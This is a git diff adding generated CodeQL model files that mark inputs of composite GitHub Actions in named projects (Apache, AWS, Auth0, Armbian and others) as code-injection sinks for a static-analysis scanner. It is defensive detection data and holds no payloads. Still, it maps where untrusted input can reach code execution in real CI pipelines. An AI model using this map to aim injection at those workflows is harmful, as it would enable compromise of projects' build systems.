"generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml new file mode 100644 index 000000000000..e9e6941e6343 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml new file mode 100644 index 000000000000..e0240360052b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml new file mode 100644 index 000000000000..cae561f77754 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml new file mode 100644 index 000000000000..18d893d4c53d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml new file mode 100644 index 000000000000..b40d68cc560b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml new file mode 100644 index 000000000000..9282d312fb8f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml new file mode 100644 index 000000000000..f0636131cdb0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml new file mode 100644 index 000000000000..4bac281500b9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml new file mode 100644 index 000000000000..3ee27175205f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml new file mode 100644 index 000000000000..37c2873b508b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml new file mode 100644 index 000000000000..231df2a7f879 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml new file mode 100644 index 000000000000..94ba6559838a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "input.version", "code-injection", "generated"] + - ["apache/camel", "*", "input.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml new file mode 100644 index 000000000000..ab91a71fc0e1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "input.env", "code-injection", "generated"] + - ["apache/flink", "*", "input.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml new file mode 100644 index 000000000000..b704cc54b822 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] 
diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml new file mode 100644 index 000000000000..b438360b5a6a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.android", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml new file mode 100644 index 000000000000..05b822ebc4d0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "input.service", "code-injection", "generated"] + - ["apache/opendal", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml new file mode 100644 index 000000000000..de7c35fa1113 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml new file mode 100644 index 000000000000..4ef3ce32bfed --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml new file mode 100644 index 000000000000..0efe533073ba --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml new file mode 100644 index 000000000000..a472b1be979e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml new file mode 100644 index 000000000000..409c39077866 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml new file mode 100644 index 000000000000..29a0e582ec7e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml new file mode 100644 index 000000000000..5d88aaf00174 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml new file mode 100644 index 000000000000..fe2fb29bfa8c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml new file mode 100644 index 000000000000..7107b1dd55d9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml new file mode 100644 index 000000000000..7ecc0cb0e614 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml new file mode 100644 index 000000000000..c75ff3a69140 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml new file mode 100644 index 000000000000..ed5dae960604 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml new file mode 100644 index 000000000000..a638ceae55ca --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml new file mode 100644 index 000000000000..eb67c35e5f5a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml new file mode 100644 index 000000000000..abfb5157d3bb --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml new file mode 100644 index 000000000000..f0c798160266 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml new file mode 100644 index 000000000000..5618781b68d6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml new file mode 100644 index 000000000000..b1a2d8e4c363 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml new file mode 100644 index 000000000000..f9b39981ab8f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml new file mode 100644 index 000000000000..1c90c92ca21b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml new file mode 100644 index 000000000000..25f194e823a6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml new file mode 100644 index 000000000000..2f1481c9c554 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml new file mode 100644 index 000000000000..67a1836e8267 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml new file mode 100644 index 000000000000..917bd6b03074 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml new file mode 100644 index 000000000000..98190bffee47 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.java", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml new file mode 100644 index 000000000000..4916ce713d7c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml new file mode 100644 index 000000000000..e015387a96db --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml new file mode 100644 index 000000000000..b9c1ff99ab38 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml new file mode 100644 index 000000000000..e8cde1a082f5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml new file mode 100644 index 000000000000..1f5bd390369b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml new file mode 100644 index 000000000000..2097e02a48ae --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file 
